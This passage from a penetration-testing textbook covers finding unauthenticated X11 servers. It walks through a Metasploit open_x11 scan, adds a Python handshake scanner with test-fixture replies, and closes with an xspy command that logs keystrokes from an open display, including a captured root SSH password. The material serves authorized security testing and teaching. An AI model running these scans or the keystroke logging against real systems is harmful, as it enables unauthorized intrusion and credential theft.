Vulnerability Scanning
55
of archaic boxes out there are still running old, unpatched, and forgotten operating systems. As you've seen in the preceding two examples, legacy systems are often the most vulnerable systems on a network.
To run the open_x11 scanner, configure it as you would most other auxiliary modules by setting RHOSTS and, optionally, THREADS. A session is shown next. Notice that at IP address 192.168.1.23 the scanner has found an open X server: one that accepts connections on TCP port 6000 from any client without authentication, typically because access control was disabled with xhost +. This is a serious finding. The X server handles the whole GUI, including the keyboard and mouse, so any client that can connect to the display can read keystrokes, grab screen contents, and inject input, with no credentials required.
msf > use auxiliary/scanner/x11/open_x11
msf auxiliary(open_x11) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    6000             yes       The target port
   THREADS  1                yes       The number of concurrent threads

msf auxiliary(open_x11) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(open_x11) > set THREADS 50
THREADS => 50
msf auxiliary(open_x11) > run
[*] Trying 192.168.1.1
[*] Trying 192.168.1.0
[*] Trying 192.168.1.2...
[*] Trying 192.168.1.29
[*] Trying 192.168.1.30
[*] Open X Server @ 192.168.1.23 (The XFree86 Project, Inc)
[*] Trying 192.168.1.31
[*] Trying 192.168.1.32
. . . SNIP . . .
[*] Trying 192.168.1.253
[*] Trying 192.168.1.254
[*] Trying 192.168.1.255
[*] Auxiliary module execution completed
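What the open_x11 module is actually testing is the X11 connection setup handshake: a client sends a 12-byte setup request with no authorization data, and a server with access control enabled answers Failed (usually "No protocol specified"), while an open server answers Success and names its vendor, which is where the "(The XFree86 Project, Inc)" in the output above comes from. The following stand-alone scanner is an added example, not Metasploit's code or the book's; it follows the X11 protocol's published setup wire format, and the build_success_reply and build_failed_reply fixtures are constructed locally for testing rather than captured from any host.

```python
"""Minimal open-X11-server check: connect to TCP 6000, send an X11 setup
request carrying no authorization data, and decode the reply status.
Added example (not auxiliary/scanner/x11/open_x11 itself). Field offsets
follow the X Window System Protocol connection-setup format; the reply
builders below are test fixtures, not captures from a real server."""
import ipaddress
import socket
import struct
import sys
from concurrent.futures import ThreadPoolExecutor

X11_PORT = 6000

# Setup request (12 bytes): byte order 'l' (little-endian), pad, protocol
# major 11, minor 0, auth-name length 0, auth-data length 0, 2 pad bytes.
SETUP_REQUEST = struct.pack("<BxHHHHxx", ord("l"), 11, 0, 0, 0)


def declared_length(header: bytes) -> int:
    """Total reply length implied by the 8-byte header: bytes 6-7 hold the
    length of the additional data in 4-byte units."""
    return 8 + 4 * struct.unpack_from("<H", header, 6)[0]


def parse_setup_reply(data: bytes) -> dict:
    """Decode a setup reply. Byte 0 is the status: 0 Failed, 1 Success,
    2 Authenticate (server wants further authorization)."""
    if len(data) < 8:
        raise ValueError("short X11 setup reply")
    status = data[0]
    major, minor, extra = struct.unpack_from("<HHH", data, 2)
    if status == 0:
        # Failed: byte 1 is the reason length; the reason text starts at byte 8.
        return {"status": "failed", "reason": data[8:8 + data[1]].decode("latin-1")}
    if status == 2:
        reason = data[8:8 + 4 * extra].rstrip(b"\x00").decode("latin-1")
        return {"status": "authenticate", "reason": reason}
    if status == 1:
        # Success: release number at byte 8, vendor length at byte 24, vendor
        # string at byte 40 (immediately after the fixed 40-byte prefix).
        (release,) = struct.unpack_from("<I", data, 8)
        (vendor_len,) = struct.unpack_from("<H", data, 24)
        vendor = data[40:40 + vendor_len].decode("latin-1")
        return {"status": "open", "vendor": vendor, "release": release,
                "protocol": (major, minor)}
    raise ValueError(f"unknown X11 setup status {status}")


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ValueError("connection closed mid-reply")
        buf += chunk
    return buf


def scan_host(host: str, port: int = X11_PORT, timeout: float = 3.0) -> dict:
    """Run the handshake against one host; 'closed' when nothing answers on
    the port, 'error' when the answer is not a well-formed X11 reply."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(SETUP_REQUEST)
            header = _recv_exact(s, 8)
            body = _recv_exact(s, declared_length(header) - 8)
            return parse_setup_reply(header + body)
    except (ConnectionRefusedError, socket.timeout):
        return {"status": "closed"}
    except (OSError, ValueError) as exc:
        return {"status": "error", "reason": str(exc)}


def build_success_reply(vendor: bytes, release: int = 40400000) -> bytes:
    """Constructed Success reply with no screens and no pixmap formats
    (test fixture; the fixed 32-byte prefix after the header is real layout)."""
    pad = (-len(vendor)) % 4
    extra = 8 + (len(vendor) + pad) // 4                      # 8 units = the 32-byte prefix
    header = struct.pack("<BxHHH", 1, 11, 0, extra)
    fixed = struct.pack("<IIIIHHBBBBBBBB4x",
                        release, 0x00400000, 0x003FFFFF, 256,  # release, rid base, rid mask, motion buffer
                        len(vendor), 65535,                    # vendor length, max request length
                        0, 0, 0, 0, 32, 32, 8, 255)            # screens, formats, byte/bit order, unit, pad, keycodes
    return header + fixed + vendor + b"\x00" * pad


def build_failed_reply(reason: bytes) -> bytes:
    """Constructed Failed reply, as an access-controlled server sends (test fixture)."""
    pad = (-len(reason)) % 4
    return struct.pack("<BBHHH", 0, len(reason), 11, 0, (len(reason) + pad) // 4) + reason + b"\x00" * pad


def scan_network(cidr: str, threads: int = 50) -> dict:
    """Scan every host address in the CIDR concurrently, like RHOSTS/THREADS."""
    hosts = [str(h) for h in ipaddress.ip_network(cidr, strict=False).hosts()]
    with ThreadPoolExecutor(max_workers=threads) as pool:
        return dict(zip(hosts, pool.map(scan_host, hosts)))


if __name__ == "__main__":
    for host, result in scan_network(sys.argv[1] if len(sys.argv) > 1 else "192.168.1.0/24").items():
        if result["status"] == "open":
            print(f"[*] Open X Server @ {host} ({result['vendor']})")
```

Run it as `python3 x11check.py 192.168.1.0/24` to reproduce the module's sweep; a host that answers "failed" has an X server listening on TCP but with access control on, which is not the open condition the module reports, and a server that answers "authenticate" is asking for a cookie the request did not carry.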
To see what an attacker could do with a vulnerability like this, start keystroke logging using Back|Track's xspy tool, like so:
root@bt:/# cd /pentest/sniffers/xspy/
root@bt:/pentest/sniffers/xspy# ./xspy -display 192.168.1.23:0 -delay 100
ssh root@192.168.1.11(+BackSpace)37
sup3rs3cr3tp4s5w0rd
ifconfig
exit